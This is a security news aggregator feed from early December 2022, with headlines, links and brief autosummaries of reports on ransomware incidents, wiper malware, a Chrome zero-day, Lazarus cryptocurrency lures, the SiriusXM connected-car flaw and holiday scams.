                Tags: FBI, scams, xmas, christmas, festive season, social media, cryptocurrency, bitcoin, app, android, fake job, offer, whatsapp, telegram, interview, resume, gift cards, survey

                We take a look at a list of popular scams compiled by the FBI to avoid this festive season, and offer our own insights.

                Autosummary: Smartphone app scams. The FBI says: Some mobile apps, often disguised as games and offered for free, are designed to steal personal information. Charity scams. The FBI says: Fraudulent charity scams, in which perpetrators set up false charities and profit from individuals who believe they are making donations to legitimate charitable organizations. Consumers should carefully research the job posting and individuals or company offering employment. We say: Work from home scams are big business over the holiday season, especially with people potentially looking for a little extra cash in the run up to the new year. Check the number of installs, how long the file has been available, developer information, and the reviews.


                Microsoft warns of Russian cyberattacks throughout the winter

                ciber
                2022-12-06 https://www.bleepingcomputer.com/news/security/microsoft-warns-of-russian-cyberattacks-throughout-the-winter/
                Microsoft has warned of Russian-sponsored cyberattacks continuing to target Ukrainian infrastructure and NATO allies in Europe throughout the winter. [...]

                Autosummary: Sandworm is a group of elite Russian hackers that have been active for at least two decades, previously linked to malicious campaigns leading to the Ukrainian blackouts of 2015 and 2016 [1, 2, 3], the KillDisk wiper attacks targeting Ukrainian banks, and the NotPetya ransomware.


                Dark web recruiting techniques: Malware, phishing, and carding

                financial exploits
                2022-12-06 https://www.helpnetsecurity.com/2022/12/06/dark-web-recruiting-techniques-video/

                In this Help Net Security video, Roman Faithfull, Cyber Intelligence Analyst at Digital Shadows, talks about how threat actors mobilize new members within the cybercriminal ecosystem. Cybercriminal forums are awash with users advertising and requesting the services of developers to design fresh new malware. Developers may be recruited to work in-house, with a monthly salary and other benefits, or they may be contracted ad hoc, with a one-time payment upon completion of commissioned work. Recruiters … More



                Resecurity partners with Totalsec to increase its presence in the Mexican cybersecurity market

                ciber
                2022-12-06 https://www.helpnetsecurity.com/2022/12/06/resecurity-totalsec/

                In August 2022, the United States and Mexico held the first dialogue between the two North American nations regarding the U.S.-Mexico Bicentennial Framework for Security, Public Health, and Safe Communities. Both countries met in August 2022 to advance their cooperation in cybersecurity and their commitment to an open, interoperable, secure, and reliable internet and stable cyberspace. Moreover, they hope to tighten their association through numerous initiatives, including sharing cyber threat information, which is fundamental at … More

                Autosummary: Echoing Yoo’s sentiments, Totalsec’s head of cybersecurity, Omar Garcia, and CEO, Francisco Sandoval, put forward: “The partnership with Resecurity brings industry-leading cyber threat intelligence to the Mexican market.


                Open Source Ransomware Toolkit Cryptonite Turns Into Accidental Wiper Malware

                exploits ransomware
                2022-12-06 https://thehackernews.com/2022/12/open-source-ransomware-toolkit.html
                A version of an open source ransomware toolkit called Cryptonite has been observed in the wild with wiper capabilities due to its "weak architecture and programming." Cryptonite, unlike other ransomware strains, is not available for sale on the cybercriminal underground, and was instead offered for free by an actor named CYBERDEVILZ until recently through a GitHub repository. The source code and


                Google Chrome zero-day exploited in the wild (CVE-2022-4262)

                exploits
                2022-12-06 https://www.helpnetsecurity.com/2022/12/06/cve-2022-4262/

                Google has patched CVE-2022-4262, a type confusion vulnerability in the V8 JavaScript engine used by Google Chrome (and Chromium), which is being exploited by attackers in the wild. No other technical details have been shared about this zero-day flaw, only that it was reported by security engineer Clement Lecigne of Google’s Threat Analysis Group (TAG), whose goal is to protect users from state-sponsored attacks and other advanced persistent threats. About CVE-2022-4262 With a “High” security … More



                Darknet's Largest Mobile Malware Marketplace Threatens Users Worldwide

                exploits
                2022-12-06 https://thehackernews.com/2022/12/darknets-largest-mobile-malware.html
                Cybersecurity researchers have shed light on a darknet marketplace called InTheBox that's designed to specifically cater to mobile malware operators. The actor behind the criminal storefront, believed to be available since at least January 2020, has been offering over 400 custom web injects grouped by geography that can be purchased by other adversaries looking to mount attacks of their own.


                Understanding NIST CSF to assess your organization's Ransomware readiness

                exploits ransomware
                2022-12-06 https://thehackernews.com/2022/12/understanding-nist-csf-to-assess-your.html
                Ransomware attacks keep increasing in volume and impact largely due to organizations' weak security controls. Mid-market companies are targeted as they possess a significant amount of valuable data but lack the level of protective controls and staffing of larger organizations. According to a recent RSM survey, 62% of mid-market companies believe they are at risk of ransomware in the next 12

                Autosummary: For each of the core functions, "Identify," "Protect," "Detect," "Respond," and "Recover": Identify. Asset management is the process of knowing what all your organization's critical assets are, where they're located, who owns them, and who has access to them. Additional controls can maximize your ransomware readiness: having communication templates (to ensure the team knows what, how, and whom to contact during an incident), performing mandatory event analysis, and deploying Security Orchestration, Automation, and Response (SOAR) technology as either a separate product or a native part of an XDR solution. According to the Microsoft Defender Report 2022, basic security hygiene such as Multi-Factor Authentication (MFA), applying zero-trust principles, keeping software updated, and using extended detection and response anti-malware still protects against 98% of attacks.


                Ransomware Toolkit Cryptonite turning into an accidental wiper

                exploits
                2022-12-06 https://securityaffairs.co/wordpress/139336/cyber-crime/cryptonite-ransomware-toolkit-wiper.html

                Researchers spotted a version of the open-source ransomware toolkit Cryptonite that doesn’t support decryption capabilities. Fortinet researchers discovered a sample of malware generated with the publicly available open-source ransomware toolkit Cryptonite that never offers the decryption window, turning it into a wiper. The experts also reported an increase in ransomware intentionally turned into wiper malware, these […]

                The post Ransomware Toolkit Cryptonite turning into an accidental wiper appeared first on Security Affairs.

                "

                Autosummary: The encryption and decryption are not robust and the ransomware lacks features like Windows Shadow Copy removal, file unlocking for a more thorough impact, anti-analysis, and defensive evasion (AMSI bypass, disabling event logging, etc.). "


                Rackspace confirms outage was caused by ransomware attack

                exploits ransomware
                2022-12-06 https://www.bleepingcomputer.com/news/security/rackspace-confirms-outage-was-caused-by-ransomware-attack/
                Texas-based cloud computing provider Rackspace has confirmed today that a ransomware attack is behind an ongoing Hosted Exchange outage described as an "isolated disruption." [...] "

                Autosummary: "As you know, on Friday, December 2nd, 2022, we became aware of suspicious activity and immediately took proactive measures to isolate the Hosted Exchange environment to contain the incident," the company said in an update to the initial incident report. "


                Massive DDoS attack takes Russia’s second-largest bank VTB offline

                financial
                2022-12-06 https://www.bleepingcomputer.com/news/security/massive-ddos-attack-takes-russia-s-second-largest-bank-vtb-offline/
                Russia's second-largest financial institution VTB Bank says it is facing the worst cyberattack in its history after its website and mobile apps were taken offline due to an ongoing DDoS (distributed denial of service) attack. [...] "

                Autosummary: The pro-Ukraine hacktivists have been very active in November, targeting over 900 Russian entities, including stores selling military equipment and drones, the Central Bank of Russia, the National Center for the Development of Artificial Intelligence, and Alfa Bank. "


                Password Reset Calls Are Costing Your Org Big Money

                financial
                2022-12-06 https://www.bleepingcomputer.com/news/security/password-reset-calls-are-costing-your-org-big-money/
                Research states that the average help desk labor cost for a single password reset is about $70. With this cost, what can an organization do to lessen the impact of password resets? [...] "

                Autosummary: Update the cached credentials of remote users to ensure the continuity of work; accessible from any web browser, the Windows login screen, or the uReset mobile application; verify identities with a choice of over 15 identity providers; user enrollment enforcement and auto-enrollment options. Password resets, while a necessity in some cases, are highly capable of self-service with a lessened impact on the helpdesk and an organization’s bottom line. According to a Yubico-sponsored report the average user spent 10.9 hours a year on password resets, leading to an average loss of $5.2 million a year in productivity for a 15,000-user organization (based on a $32-an-hour average). This is not uncommon, as many users wait until the last minute for a password change, leading to locked-out accounts and longer-than-expected password reset tickets. "


                Iranian State Hackers Targeting Key Figures in Activism, Journalism, and Politics

                government industry
                2022-12-06 https://thehackernews.com/2022/12/iranian-state-hackers-targeting-key.html
                Hackers with ties to the Iranian government have been linked to an ongoing social engineering and credential phishing campaign directed against human rights activists, journalists, researchers, academics, diplomats, and politicians working in the Middle East. At least 20 individuals are believed to have been targeted, Human Rights Watch (HRW) said in a report published Monday, attributing the "

                Autosummary: "In a Middle East region rife with surveillance threats for activists, it's essential for digital security researchers to not only publish and promote findings, but also prioritize the protection of the region's embattled activists, journalists, and civil society leaders," Ghattas said. "


                Russia’s second-largest bank VTB Bank under DDoS attack

                financial
                2022-12-06 https://securityaffairs.co/wordpress/139354/hacking/vtb-bank-ddos-attack.html

                Russia’s second-largest bank VTB Bank reveals it is facing the largest DDoS (distributed denial of service) attack in its history. State-owned VTB Bank, the second-largest financial institution in Russia, says it is facing the largest DDoS (distributed denial of service) attack in its history. The pro-Ukraine collective IT Army of Ukraine has claimed responsibility for […]

                The post Russia’s second-largest bank VTB Bank under DDoS attack appeared first on Security Affairs.

                "

                Autosummary: "


                Rackspace Hosted Exchange outage was caused by ransomware

                exploits ransomware
                2022-12-06 https://www.helpnetsecurity.com/2022/12/06/rackspace-ransomware/

                Rackspace has finally confirmed the cause of the ongoing outage of its Hosted Exchange service: it’s ransomware. “As you know, on Friday, December 2nd, 2022, we became aware of suspicious activity and immediately took proactive measures to isolate the Hosted Exchange environment to contain the incident. We have since determined this suspicious activity was the result of a ransomware incident,” the company stated in the newest released service announcement. “Alongside our internal security team, we … More

                The post Rackspace Hosted Exchange outage was caused by ransomware appeared first on Help Net Security.

                "

                Autosummary: The confirmation came just a few hours after the publication of a press release on the situation, in which Rackspace said the security incident “may result in a loss of revenue for the Hosted Exchange business, which generates approximately $30 million of annual revenue in the Apps & Cross Platform segment,” and that they expect to have “incremental costs associated with its response to the incident.” "


                Antwerp's city services down after hackers attack digital partner

                government
                2022-12-06 https://www.bleepingcomputer.com/news/security/antwerps-city-services-down-after-hackers-attack-digital-partner/
                The city of Antwerp, Belgium, is working to restore its digital services that were disrupted last night by a cyberattack on its digital provider. [...] "

                Autosummary: The disruption has affected services used by citizens, schools, daycare centers, and the police, which have been working intermittently today. "


                Ransomware attack knocks Rackspace’s Exchange servers offline

                exploits
                2022-12-06 https://www.networkworld.com/article/3681895/ransomware-attack-knocks-rackspaces-exchange-servers-offline.html#tk.rss_security
                Rackspace’s hosting for Exchange servers remained offline Tuesday after an outage Friday that the company now ascribes to a ransomware attack. "

                Autosummary: "


                Vehicle Identification Numbers reveal driver data via telematics

                industry
                2022-12-06 https://www.malwarebytes.com/blog/news/2022/12/vehicle-identification-numbers-reveal-driver-data-via-telematics

                Categories: News

                Tags: VIN

                Tags: vehicle identification number

                Tags: car

                Tags: telematics

                Tags: SiriusXM

                Tags: data

                We take a look at reports of vehicle identification numbers being used to potentially reveal customer data through telematics.

                (Read more...)

                The post Vehicle Identification Numbers reveal driver data via telematics appeared first on Malwarebytes Labs.

                "

                Autosummary: Earlier this year, we were able to remotely unlock, start, locate, flash, and honk any remotely connected Honda, Nissan, Infiniti, and Acura vehicles, completely unauthorized, knowing only the VIN number of the car. Worse, using the VIN in this way was enough to pull up the customer’s name, phone number, address, and car details. Can you imagine anyone doing this now, as opposed to using business addresses, PO boxes, or domain privacy services in the age of trolling, doxxing, and swatting? Here's how we found it, and how it works: pic.twitter.com/ul3A4sT47k — Sam Curry (@samwcyo) November 30, 2022 As with so many interesting system exploits, the weak spot is a service being made use of by many. "


                Engage your employees with better cybersecurity training

                ciber
                2022-12-05 https://www.helpnetsecurity.com/2022/12/05/cybersecurity-training-employees/

                Cybercriminals use a variety of tactics all at once and are constantly innovating. Organizations need to do the same and take a multidimensional approach to cybersecurity because biannual training videos aren’t enough to engage employees or protect your business. Is your cybersecurity strategy disengaging employees? A bad actor stole $540 million from an NFT gaming company in July, an attack that started with a fake job offer on LinkedIn. In cases like these, social engineering … More

                The post Engage your employees with better cybersecurity training appeared first on Help Net Security.

                "

                Autosummary: 2. Create clear and specific cybersecurity policies When organizations draft their cybersecurity policies, they often apply a one-size-fits-all approach. When providing training related to social engineering or other types of attacks, strike a balance between communicating the very real consequences of cyber-attacks and more positive messaging, like best practices and cyber hygiene routines. Social engineering attacks can present as emails from (what appear to be) friends, asking you for credit card information, or they can be hyper-personal attacks in which fraudsters clone family members’ social media accounts and use personal photos and location information to convince you they’re real. "


                Critical Ping Vulnerability Allows Remote Attackers to Take Over FreeBSD Systems

                exploits
                2022-12-05 https://thehackernews.com/2022/12/critical-ping-vulnerability-allows.html
                The maintainers of the FreeBSD operating system have released updates to remediate a security vulnerability impacting the ping module that could be potentially exploited to crash the program or trigger remote code execution. The issue, assigned the identifier CVE-2022-23093, impacts all supported versions of FreeBSD and concerns a stack-based buffer overflow vulnerability in the ping service. "

                Autosummary: "


                Lazarus APT uses fake cryptocurrency apps to spread AppleJeus Malware

                exploits
                2022-12-05 https://securityaffairs.co/wordpress/139290/apt/lazarus-apt-bloxholder-campaign.html

                The North Korea-linked Lazarus APT spreads fake cryptocurrency apps under the fake brand BloxHolder to install the AppleJeus malware. Volexity researchers warn of a new malware campaign conducted by the North Korea-linked Lazarus APT against cryptocurrency users. The threat actors were observed spreading fake cryptocurrency apps under the fake brand BloxHolder to deliver the AppleJeus […]

                The post Lazarus APT uses fake cryptocurrency apps to spread AppleJeus Malware appeared first on Security Affairs.

                "

                Autosummary: “While the file was no longer available at the time of analysis, based on public sandbox results for the file in question, the downloaded payload, “Background.png”, embeds the following three files: “Logagent.exe” – a legitimate file (md5: eb1e19613a6a260ddd0ae9224178355b); “wsock32.dll” – a side-loaded library internally named HijackingLib.dll (md5: e66bc1e91f1a214d098cf44ddb1ae91a); “56762eb9-411c-4842-9530-9922c46ba2da” – an encoded payload decoded by “wsock32.dll”,” continues the analysis. "


                Russian Courts Targeted by New CryWiper Data Wiper Malware Posing as Ransomware

                exploits ransomware
                2022-12-05 https://thehackernews.com/2022/12/russian-courts-targeted-by-new-crywiper.html
                A new data wiper malware called CryWiper has been found targeting Russian government agencies, including mayor's offices and courts. "Although it disguises itself as a ransomware and extorts money from the victim for "decrypting" data, [it] does not actually encrypt, but purposefully destroys data in the affected system," Kaspersky researchers Fedor Sinitsyn and Janis Zinchenko said in a "

                Autosummary: "


                SiriusXM Vulnerability Lets Hackers Remotely Unlock and Start Connected Cars

                exploits
                2022-12-05 https://thehackernews.com/2022/12/siriusxm-vulnerability-lets-hackers.html
                Cybersecurity researchers have discovered a security vulnerability that exposes cars from Honda, Nissan, Infiniti, and Acura to remote attacks through a connected vehicle service provided by SiriusXM. The issue could be exploited to unlock, start, locate, and honk any car in an unauthorized manner just by knowing the vehicle's vehicle identification number (VIN), researcher Sam Curry said in a "

                Autosummary: "


                North Korean Hackers Spread AppleJeus Malware Disguised as Cryptocurrency Apps

                exploits
                2022-12-05 https://thehackernews.com/2022/12/north-korean-hackers-spread-applejeus.html
                The Lazarus Group threat actor has been observed leveraging fake cryptocurrency apps as a lure to deliver a previously undocumented version of the AppleJeus malware, according to new findings from Volexity. "This activity notably involves a campaign likely targeting cryptocurrency users and organizations with a variant of the AppleJeus malware by way of malicious Microsoft Office documents," "

                Autosummary: "


                Exclusive: The largest mobile malware marketplace identified by Resecurity in the Dark Web

                exploits
                2022-12-05 https://securityaffairs.co/wordpress/139310/cyber-crime/dark-web-mobile-malware-marketplace.html

                Resecurity has identified a new underground marketplace in the Dark Web oriented towards mobile malware developers and operators. “In the Box” dark web marketplace is leveraged by cybercriminals to attack over 300 financial institutions (FIs), payment systems, social media and online-retailers in 43 countries Resecurity, the California-based cybersecurity company protecting major Fortune 500 companies, has identified a new underground marketplace in […]

                The post Exclusive: The largest mobile malware marketplace identified by Resecurity in the Dark Web appeared first on Security Affairs.

                "

                Autosummary: Currently, cybercriminals are offering over 1,849 malicious scenarios for sale, designed for major financial institutions, ecommerce, payment systems, online retailers, and social media companies from over 45 countries including the U.S., the U.K., Canada, Brazil, Colombia, Mexico, Saudi Arabia, Bahrain, Turkey, and Singapore. The operators behind the “InTheBox” marketplace are closely connected to developers of major mobile malware families including Alien, Cerberus, Ermac, Hydra, Octopus (aka “Octo”), Poison, and MetaDroid. "


                Critical Ping bug potentially allows remote hack of FreeBSD systems

                exploits
                2022-12-05 https://securityaffairs.co/wordpress/139300/hacking/cve-2022-23093-freebsd-systems-flaw.html

                A critical stack-based buffer overflow bug, tracked as CVE-2022-23093, in the ping service can allow attackers to take over FreeBSD systems. The maintainers of the FreeBSD operating system released updates to address a critical flaw, tracked as CVE-2022-23093, in the ping module that could be potentially exploited to gain remote code execution. The ping utility allows testing the […]

                The post Critical Ping bug potentially allows remote hack of FreeBSD systems appeared first on Security Affairs.

                "

                Autosummary: "


                New BMC Supply Chain Vulnerabilities Affect Servers from Dozens of Manufacturers

                industry
                2022-12-05 https://thehackernews.com/2022/12/new-bmc-supply-chain-vulnerabilities.html
                Three different security flaws have been disclosed in American Megatrends (AMI) MegaRAC Baseboard Management Controller (BMC) software that could lead to remote code execution on vulnerable servers. "The impact of exploiting these vulnerabilities include remote control of compromised servers, remote deployment of malware, ransomware and firmware implants, and server physical damage (bricking)," "

                Autosummary: "


                French hospital cancels operations after a ransomware attack

                exploits ransomware
                2022-12-05 https://securityaffairs.co/wordpress/139316/cyber-crime/french-hospital-ransomware-attack-2.html

                A French hospital near Paris canceled operations and transferred some patients due to a cyber attack suffered over the weekend. France’s health ministry announced that the Hospital Centre of Versailles was hit by a cyber attack over the weekend. Hospital Centre of Versailles, which includes Andre-Mignot Hospital, Richaud Hospital and the Despagne Retirement Home, canceled […]

                The post French hospital cancels operations after a ransomware attack appeared first on Security Affairs.

                "

                Autosummary: "


                Ransomware attack forces French hospital to transfer patients

                exploits
                2022-12-05 https://www.bleepingcomputer.com/news/security/ransomware-attack-forces-french-hospital-to-transfer-patients/
                The André-Mignot teaching hospital in the suburbs of Paris had to shut down its phone and computer systems because of a ransomware attack that hit on Saturday evening. [...] "

                Autosummary: I will go this midday to show the government's support for the teams mobilised to ensure the care of patients. @FrcsBraun — Jean-Noël Barrot (@jnbarrot) December 4, 2022 Jean-Noël Barrot, the Minister Delegate in charge of Digital Transition and Telecommunications, said the hospital immediately isolated the infected systems to limit the spread of the malware to additional devices and alerted the French National Authority for Security and Defense of Information Systems (ANSSI). "


                Biometrics are even less accurate than we thought

                industry
                2022-12-05 https://www.computerworld.com/article/3682149/biometrics-are-even-less-accurate-than-we-thought.html#tk.rss_security

                Biometrics is supposed to be one of the underpinnings of a modern authentication system. But many biometric implementations (whether that be fingerprint scans or face recognition) can be wildly inaccurate, and the only universally positive thing to say about them is they're better than nothing.

                Also — and this may prove critical — the fact that biometrics are falsely seen as being very accurate may be sufficient to dissuade some fraud attempts. 

                There are a variety of practical reasons biometrics don't work well in the real world, and a recent post by a cybersecurity specialist at KnowBe4, a security awareness training vendor, adds a new layer of complexity to the biometrics issue.


                "

                Autosummary: On top of that, many vendors, including Apple (iOS) and Google (Android), make marketing choices in their settings, where they choose how stringent or lenient the authentication is. “So far, none of the submitted candidates come anywhere close,” Grimes wrote, summarizing the NIST findings. In other words, if a thief wants to get around biometrics, all he or she has to do is fail once or twice and then deal with the easier-to-crack PIN. "


                CISA orders agencies to patch exploited Google Chrome bug by Dec 26th

                exploits
                2022-12-05 https://www.bleepingcomputer.com/news/security/cisa-orders-agencies-to-patch-exploited-google-chrome-bug-by-dec-26th/
                The Cybersecurity and Infrastructure Security Agency (CISA) has added one more security vulnerability to its list of bugs known to be exploited in attacks. [...] "

                Autosummary: "


                Russian courts attacked by CryWiper malware that poses as ransomware

                exploits ransomware
                2022-12-05 https://www.bitdefender.com/blog/hotforsecurity/russian-courts-attacked-by-crywiper-malware-that-poses-as-ransomware/
                Russian courts and government agencies have been hit by a previously-undocumented strain of data-wiping malware known as CryWiper. It poses as ransomware, but isn't interested in making money out of its victims... Read more in my article on the Hot for Security blog. "

                Autosummary: "


                Lazarus group uses fake cryptocurrency apps to plant AppleJeus malware

                exploits
                2022-12-05 https://www.malwarebytes.com/blog/news/2022/12/lazarus-group-uses-fake-cryptocurrency-apps-to-plant-applejeus-malware

                Categories: News

                Categories: Threats

                Tags: Lazarus

                Tags: APT38

                Tags: AppleJeus

                Tags: sideloading

                Tags: BloxHolder

                Researchers have found a new Lazarus campaign, once again targeting cryptocurrency users and organizations by deploying a fake website and malicious documents.

                (Read more...)

                The post Lazarus group uses fake cryptocurrency apps to plant AppleJeus malware appeared first on Malwarebytes Labs.

                "

                Autosummary: IOCs: users that installed the BloxHolder msi may also find the application in their list of installed programs. AppleJeus: since 2018, one of Lazarus Group's tactics has been to disguise AppleJeus malware as cryptocurrency trading platforms for both Windows and Mac. "


                Update now! Emergency fix for Google Chrome's V8 JavaScript engine zero-day flaw released

                exploits
                2022-12-05 https://www.malwarebytes.com/blog/news/2022/12/update-now-emergency-fix-for-google-chromes-v8-javascript-engine-zero-day-flaw-released

                Categories: Exploits and vulnerabilities

                Categories: News

                Tags: V8

                Tags: V8 JavaScript Engine

                Tags: Google Chrome

                Tags: Chrome

                Tags: CVE-2022-4262

                Tags: 108.0.5359.94

                Tags: 108.0.5359.95

                Tags: Chrome V8 flaw

                Tags: type confusion

                Google has rolled out an out-of-band patch for an actively exploited zero-day vulnerability in its V8 JavaScript engine. Make sure you"re using the latest version.

                (Read more...)

                The post Update now! Emergency fix for Google Chrome's V8 JavaScript engine zero-day flaw released appeared first on Malwarebytes Labs.

                "

                Autosummary: On Friday, December 2, Google rolled out an out-of-band patch for an actively exploited zero-day vulnerability in its V8 JavaScript engine. "


                Sherweb partners with Malwarebytes to offer endpoint security for MSPs

                exploits
                2022-12-04 https://www.helpnetsecurity.com/2022/12/04/sherweb-malwarebytes/

                Sherweb has announced the addition of Malwarebytes to its cloud solutions portfolio. Malwarebytes provides advanced endpoint protection in an evolving threat landscape. It can be used to provide protection on its own or combined with other solutions to create a layered defense. Studies have shown that Malwarebytes found and removed hidden threats on 39% of devices with another antivirus installed, making it the clear choice for MSPs who want to offer their clients the most … More

                The post Sherweb partners with Malwarebytes to offer endpoint security for MSPs appeared first on Help Net Security.

                "

                Autosummary: "


                New CryWiper wiper targets Russian entities masquerading as a ransomware

                exploits ransomware
                2022-12-04 https://securityaffairs.co/wordpress/139237/malware/crywiper-wiper.html

                Experts spotted a new data wiper, dubbed CryWiper, that was employed in destructive attacks against Russian mayor’s offices and courts. Researchers from Kaspersky discovered a previously unknown data wiper, dubbed CryWiper, that was employed in destructive attacks against Russian mayor’s offices and courts. The malware masquerades as ransomware, but the analysis of the code demonstrates that it […]

                The post New CryWiper wiper targets Russian entities masquerading as a ransomware appeared first on Security Affairs.

                "

                Autosummary: "


                Android malware apps with 2 million installs spotted on Google Play

                exploits
                2022-12-04 https://www.bleepingcomputer.com/news/security/android-malware-apps-with-2-million-installs-spotted-on-google-play/
                A new set of Android malware, phishing, and adware apps have infiltrated the Google Play store, tricking over two million people into installing them. [...] "

                Autosummary: "


                A new Linux flaw can be chained with other two bugs to gain full root privileges

                exploits
                2022-12-03 https://securityaffairs.co/wordpress/139209/hacking/three-linux-bugs-full-root-privileges.html

                Qualys researchers demonstrated how to chain a new Linux flaw with two other issues to gain full root privileges on an impacted system. Researchers at the Qualys’ Threat Research Unit demonstrated how to chain a new Linux vulnerability, tracked as CVE-2022-3328, with two other flaws to gain full root privileges on an affected system. The […]

                The post A new Linux flaw can be chained with other two bugs to gain full root privileges appeared first on Security Affairs.

                "

                Autosummary: "


                Phylum Automated Vulnerability Reachability strengthens software supply chain security

                exploits
                2022-12-03 https://www.helpnetsecurity.com/2022/12/03/phylum-automated-vulnerability-reachability/

                Phylum has added Automated Vulnerability Reachability to its software supply chain security platform capabilities. With the ability to focus only on fixing what matters, security pros can end the deluge of false positives and developers can innovate with greater speed and confidence. This new introduction, combined with Phylum’s ability to block and prioritize open-source code risks, provides organizations with the comprehensive software supply chain security. Vulnerabilities represent a clear and present danger to the integrity … More

                The post Phylum Automated Vulnerability Reachability strengthens software supply chain security appeared first on Help Net Security.

                "

                Autosummary: This new introduction, combined with Phylum’s ability to block and prioritize open-source code risks, provides organizations with the comprehensive software supply chain security. "


                Google Rolls Out New Chrome Browser Update to Patch Yet Another Zero-Day Vulnerability

                exploits
                2022-12-03 https://thehackernews.com/2022/12/google-rolls-out-new-chrome-browser.html
                Search giant Google on Friday released an out-of-band security update to fix a new actively exploited zero-day flaw in its Chrome web browser. The high-severity flaw, tracked as CVE-2022-4262, concerns a type confusion bug in the V8 JavaScript engine. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the issue on November 29, 2022. Type confusion "

                Autosummary: "


                Google fixed the ninth actively exploited Chrome zeroday this year

                exploits
                2022-12-03 https://securityaffairs.co/wordpress/139226/security/9-google-chrome-zero-day.html

                Google released security updates to address a new Chrome zero-day flaw, tracked as CVE-2022-4262, actively exploited in the wild. Google rolled out an emergency security update for the Chrome web browser to address a new zero-day vulnerability, tracked as CVE-2022-4262, that is actively exploited. The CVE-2022-4262 vulnerability is a type confusion bug in the V8 […]

                The post Google fixed the ninth actively exploited Chrome zeroday this year appeared first on Security Affairs.

                "

                Autosummary: CVE-2022-2856 (August 17) – insufficient validation of untrusted input in Intents; CVE-2022-2294 (July 4) – heap buffer overflow in the Web Real-Time Communications (WebRTC) component; CVE-2022-1364 (April 14) – type confusion issue that resides in the V8 JavaScript engine; CVE-2022-1096 (March 25) – type confusion in the V8 JavaScript engine; CVE-2022-0609 (February 14) – use after free issue that resides in the Animation component. "


                Compromised OEM Android platform certificates used to sign malware

                exploits
                2022-12-02 https://www.bleepingcomputer.com/news/security/compromised-oem-android-platform-certificates-used-to-sign-malware/
                ​Multiple platform certificates used by Android OEM device vendors to digitally sign core system applications were utilized by threat actors to sign apps containing malware. [...] "

                Autosummary: However, based on the results, even though Google said that "all affected parties were informed of the findings and have taken remediation measures to minimize the user impact," it looks like not all the vendors have followed Google's recommendations since, at least in Samsung's case, the leaked platform certificates are still being used to digitally sign apps. "


                Financial organizations more prone to accidental data leakage

                financial
                2022-12-02 https://www.helpnetsecurity.com/2022/12/02/financial-sector-cloud-security/

                Netwrix announced additional findings for the financial and banking sector from its global 2022 Cloud Security Report. Compared to other industries surveyed, financial institutions are much more concerned about users who have legitimate access to their cloud infrastructure. Indeed, 44 percent of respondents in this sector say their own IT staff poses the biggest risk to data security in the cloud and 47 percent worry about contractors and partners, compared to 30 percent and 36 … More

                The post Financial organizations more prone to accidental data leakage appeared first on Help Net Security.

                "

                Autosummary: "


                Samsung, LG, Mediatek certificates compromised to sign Android malware

                exploits
                2022-12-02 https://www.bleepingcomputer.com/news/security/samsung-lg-mediatek-certificates-compromised-to-sign-android-malware/
                Multiple platform certificates used by Android OEM device vendors to digitally sign core system applications have also been used to sign Android apps containing malware. [...] "

                Autosummary: However, based on the results, even though Google said that "all affected parties were informed of the findings and have taken remediation measures to minimize the user impact," it looks like not all the vendors have followed Google's recommendations since, at least in Samsung's case, the leaked platform certificates are still being used to digitally sign apps. "


                Cuba Ransomware Extorted Over $60 Million in Ransom Fees from More than 100 Entities

                exploits ransomware
                2022-12-02 https://thehackernews.com/2022/12/cuba-ransomware-extorted-over-60.html
                The threat actors behind Cuba (aka COLDDRAW) ransomware have received more than $60 million in ransom payments and compromised over 100 entities across the world as of August 2022. In a new advisory shared by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of... "

                Autosummary: "


                All of Medibank’s stolen data leaked, Australia increases maximum penalties for data breaches

                financial
                2022-12-02 https://www.helpnetsecurity.com/2022/12/02/all-of-medibanks-stolen-data-leaked-australia/

                Australian health insurance provider Medibank has confirmed that another batch of the customer data stolen in the recent breach has been leaked. “We are conducting further analysis on the files today and at this stage believe there are 6 zipped files in a folder called ‘full’ containing the raw data that we believed the criminal stole,” the company said. They previously confirmed that data of 9.7 million of its current and former customers was stolen. … More

                The post All of Medibank’s stolen data leaked, Australia increases maximum penalties for data breaches appeared first on Help Net Security.

                "

                Autosummary: There’s no doubt that, given the sensitive nature of the compromised and leaked data, the support program they set up is very comprehensive, offering free identity monitoring services, counseling and resources for mental health support, hardship support, and so on. "


                How Windows 11's Enhanced Phishing Protection guards your password

                financial
                2022-12-02 https://www.bleepingcomputer.com/news/microsoft/how-windows-11s-enhanced-phishing-protection-guards-your-password/
                One of the easier ways to steal a user's credentials is through a convincing fake login page or application. To help combat the constant risk of password theft, Microsoft added enhanced phishing protection in Windows 11 Version 22H2. [...] "

                Autosummary: Block user names, display names, specific words, consecutive characters, incremental passwords, and the reuse of a part of the current password. With the Specops Authentication Client, upon password changes, instantly inform your users as to why their password won't work, even more so if the password has been stolen through a sophisticated phishing scam. These include settings such as whether to enable the feature, whether or not to notify a user of a malicious website, whether a password has been reused, or if an unsafe application has been detected. "


                Cuba Ransomware received over $60M in Ransom payments as of August 2022

                exploits ransomware
                2022-12-02 https://securityaffairs.co/wordpress/139183/cyber-crime/cuba-ransomware-alert-cisa-fbi.html

                Cuba ransomware gang received more than $60 million in ransom payments related to attacks against 100 entities worldwide as of August 2022. The threat actors behind the Cuba ransomware (aka COLDDRAW, Tropical Scorpius) have demanded over 145 million U.S. Dollars (USD) and received more than $60 million in ransom payments from over 100 victims worldwide […]

                The post Cuba Ransomware received over $60M in Ransom payments as of August 2022 appeared first on Security Affairs.

                "

                Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) published a joint advisory that provides technical details about the gang’s operations, including tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with Cuba ransomware. "


                DHS Cyber Safety Board to review Lapsus$ gang’s hacking tactics

                industry
                2022-12-02 https://www.bleepingcomputer.com/news/security/dhs-cyber-safety-board-to-review-lapsus-gang-s-hacking-tactics/
                The Department of Homeland Security (DHS) Cyber Safety Review Board will review attacks linked to an extortion group known as Lapsus$, which breached multiple high-profile companies in recent attacks. [...] "

                Autosummary: The Lapsus$ hacker group made the news earlier this year after hacking Microsoft, Nvidia, T-Mobile, Samsung, Uber, Vodafone, Ubisoft, Okta, and e-commerce giant Mercado Libre. "


                New CryWiper malware wipes data in attack against Russian org

                exploits
                2022-12-02 https://www.bleepingcomputer.com/news/security/new-crywiper-malware-wipes-data-in-attack-against-russian-org/
                A previously undocumented data wiper named CryWiper is masquerading as ransomware, extorting victims to pay for a decrypter, but in reality, it just destroys data beyond recovery. [...] "

